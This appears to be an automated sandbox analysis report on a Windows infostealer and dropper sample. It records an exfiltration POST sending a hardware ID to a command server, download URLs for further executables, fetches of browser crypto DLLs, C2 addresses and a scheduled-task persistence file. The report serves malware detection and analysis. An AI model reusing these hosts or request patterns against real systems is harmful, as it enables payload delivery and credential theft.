Source: unknown HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJEHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 38 43 44 38 35 31 36 39 32 41 33 32 34 35 37 38 32 34 38 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 2d 2d 0d 0a Data Ascii: ------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="hwid"DB8CD851692A3245782482------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="build"default------CGCFBFBGHDGDAKECAKJE--
Source: explortu.exe, 00000009.00000002.4583229120.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.155/I
Source: explortu.exe, 00000009.00000002.4583229120.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.155/ku4Nor9/index.php
Source: explortu.exe, 00000009.00000002.4583229120.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.155/ku4Nor9/index.phpD
Source: explortu.exe, 00000009.00000002.4583229120.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.155/ku4Nor9/index.phpE
Source: explortu.exe, 00000009.00000002.4583229120.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.155/ku4Nor9/index.phpM32
Source: explortu.exe, 00000009.00000002.4583229120.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.155/ku4Nor9/index.phpO
Source: explortu.exe, 00000009.00000002.4583229120.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.155/ku4Nor9/index.phpm32
Source: explortu.exe, 00000009.00000002.4583229120.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.155/ku4Nor9/index.phpo
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000C96000.00000040.00000001.01000000.00000003.sdmp, tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000C96000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exepData
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.00000000007D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000C96000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000C96000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exephprefoxox
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000C96000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exera
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.00000000007BE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dll
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll0L
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll/O
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dllNLu
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll#L
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: tAa6xNsucX.exe String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: tAa6xNsucX.exe String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: tAa6xNsucX.exe String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.5.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2340937251.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: tAa6xNsucX.exe, 00000000.00000002.2340724909.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2327877769.000000001CCFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: tAa6xNsucX.exe, 00000000.00000003.2183850459.0000000000856000.00000004.00000020.00020000.00000000.sdmp, EGCFHDAK.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp, AFCFHDHIIIECBGCAKFIJ.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp, AFCFHDHIIIECBGCAKFIJ.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: tAa6xNsucX.exe, 00000000.00000003.2183850459.0000000000856000.00000004.00000020.00020000.00000000.sdmp, EGCFHDAK.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tAa6xNsucX.exe, 00000000.00000003.2183850459.0000000000856000.00000004.00000020.00020000.00000000.sdmp, EGCFHDAK.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tAa6xNsucX.exe, 00000000.00000003.2183850459.0000000000856000.00000004.00000020.00020000.00000000.sdmp, EGCFHDAK.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp, AFCFHDHIIIECBGCAKFIJ.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp, AFCFHDHIIIECBGCAKFIJ.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: tAa6xNsucX.exe, 00000000.00000003.2183850459.0000000000856000.00000004.00000020.00020000.00000000.sdmp, EGCFHDAK.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tAa6xNsucX.exe, 00000000.00000003.2183850459.0000000000856000.00000004.00000020.00020000.00000000.sdmp, EGCFHDAK.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tAa6xNsucX.exe, 00000000.00000003.2183850459.0000000000856000.00000004.00000020.00020000.00000000.sdmp, EGCFHDAK.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AFCFHDHIIIECBGCAKFIJ.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://support.mozilla.org
Source: AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp, AFCFHDHIIIECBGCAKFIJ.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp, AFCFHDHIIIECBGCAKFIJ.0.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: tAa6xNsucX.exe, 00000000.00000003.2183850459.0000000000856000.00000004.00000020.00020000.00000000.sdmp, EGCFHDAK.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: tAa6xNsucX.exe, 00000000.00000003.2183850459.0000000000856000.00000004.00000020.00020000.00000000.sdmp, EGCFHDAK.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://www.mozilla.org
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000C96000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000C96000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000C96000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000C96000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: tAa6xNsucX.exe, 00000000.00000003.2252882264.000000002F085000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tAa6xNsucX.exe, 00000000.00000003.2252882264.000000002F085000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: tAa6xNsucX.exe, 00000000.00000003.2252882264.000000002F085000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJDHJKFIECAAKFIJJK.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000D3A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary
barindex
PE file contains section with special chars
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name:
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name: .idata
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explortu.exe.7.dr Static PE information: section name:
Source: explortu.exe.7.dr Static PE information: section name: .idata
Source: explortu.exe.7.dr Static PE information: section name:
PE file has nameless sections
Source: tAa6xNsucX.exe Static PE information: section name:
Source: tAa6xNsucX.exe Static PE information: section name:
Source: tAa6xNsucX.exe Static PE information: section name:
Source: tAa6xNsucX.exe Static PE information: section name:
Source: tAa6xNsucX.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C37B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C37B700
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C37B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C37B8C0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C37B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C37B910
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C31F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C31F280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe File created: C:\Windows\Tasks\explortu.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3135A0 0_2_6C3135A0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C38542B 0_2_6C38542B
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C355C10 0_2_6C355C10
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C362C10 0_2_6C362C10
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C38AC00 0_2_6C38AC00
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C38545C 0_2_6C38545C
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C325440 0_2_6C325440
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3734A0 0_2_6C3734A0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C37C4A0 0_2_6C37C4A0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C326C80 0_2_6C326C80
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C356CF0 0_2_6C356CF0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C31D4E0 0_2_6C31D4E0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C33D4D0 0_2_6C33D4D0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3264C0 0_2_6C3264C0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C33ED10 0_2_6C33ED10
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C340512 0_2_6C340512
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C32FD00 0_2_6C32FD00
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3785F0 0_2_6C3785F0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C350DD0 0_2_6C350DD0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C379E30 0_2_6C379E30
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C357E10 0_2_6C357E10
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C365600 0_2_6C365600
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C31C670 0_2_6C31C670
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C386E63 0_2_6C386E63
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C339E50 0_2_6C339E50
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C353E50 0_2_6C353E50
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C334640 0_2_6C334640
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C362E4E 0_2_6C362E4E
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C374EA0 0_2_6C374EA0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C335E90 0_2_6C335E90
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C37E680 0_2_6C37E680
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C31BEF0 0_2_6C31BEF0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C32FEF0 0_2_6C32FEF0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3876E3 0_2_6C3876E3
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C357710 0_2_6C357710
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C329F00 0_2_6C329F00
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3677A0 0_2_6C3677A0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C346FF0 0_2_6C346FF0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C31DFE0 0_2_6C31DFE0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C35B820 0_2_6C35B820
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C364820 0_2_6C364820
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C327810 0_2_6C327810
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C35F070 0_2_6C35F070
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C338850 0_2_6C338850
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C33D850 0_2_6C33D850
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3460A0 0_2_6C3460A0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C33C0E0 0_2_6C33C0E0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3558E0 0_2_6C3558E0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3850C7 0_2_6C3850C7
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C36B970 0_2_6C36B970
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C38B170 0_2_6C38B170
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C32D960 0_2_6C32D960
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C33A940 0_2_6C33A940
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C34D9B0 0_2_6C34D9B0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C31C9A0 0_2_6C31C9A0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C355190 0_2_6C355190
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C372990 0_2_6C372990
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C359A60 0_2_6C359A60
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C32CAB0 0_2_6C32CAB0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C382AB0 0_2_6C382AB0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3122A0 0_2_6C3122A0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C344AA0 0_2_6C344AA0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C38BA90 0_2_6C38BA90
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C331AF0 0_2_6C331AF0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C35E2F0 0_2_6C35E2F0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C358AC0 0_2_6C358AC0
